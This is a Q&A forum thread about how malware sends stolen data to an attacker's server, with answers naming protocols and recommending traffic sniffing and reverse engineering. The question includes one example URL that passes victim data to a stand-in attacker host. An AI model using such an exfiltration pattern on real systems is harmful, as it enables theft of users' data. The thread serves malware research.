# How and what is used when information is sent to a hacker's server?

Tags: encryption, http

I'm working in some malware research, my main question is how the victim's data is transfered over the internet, protocol and how?  Using HTTP or any other way?

As fat as I know the data can be sent by a HTTP request for example:

```
hackerserver.com/pageStorer?givemedata={Heregoesvictimdata}
```

Does the information has to be encrypted or has to be packed secure?

Thank you everyone.

Answer (score 3, accepted):

Well I'm not quite sure what you're asking exactly as your question does not seem too specific.

There is malware that will have communication between a hackers device and yours, and there is malware that will have no outgoing connections at all.

For malware that communicates information from your machine to another, there are usually a few mediums of communications. Think of RAT's and Trojans in this sense.

There are many forms of an attacker communicating with your machine, which can be through SSH, FTP, and even HTTP. The communication can be done through TCP or UDP.

Basically it depends on the malware and what its meant to do.
Virtually all communication channels are open and probably used by all kinds of malware.

I hope from now you can narrow down your research and find answers more quickly.

Hope I helped, and good luck with your research ^_^ .

EDIT: The information is sometimes encrypted to hide itself from sniffers, and sometimes it is not. It depends.

Answer (score 3):

The answer is, ***it depends.***

Malware can use any method it wants to transfer data. HTTP, FTP, P2P, etc...

In order to figure out how data is transferred you will have to analyze the malware.

Dynamic analysis of the malware can provide this information easily by sniffing traffic produced by the malware. A tool like Wireshark may help.

Static analysis will provide with concrete evidence of how data is transferred. Reverse engineering will show you exactly what protocols and ports are used.

Malware analysis is a huge topic.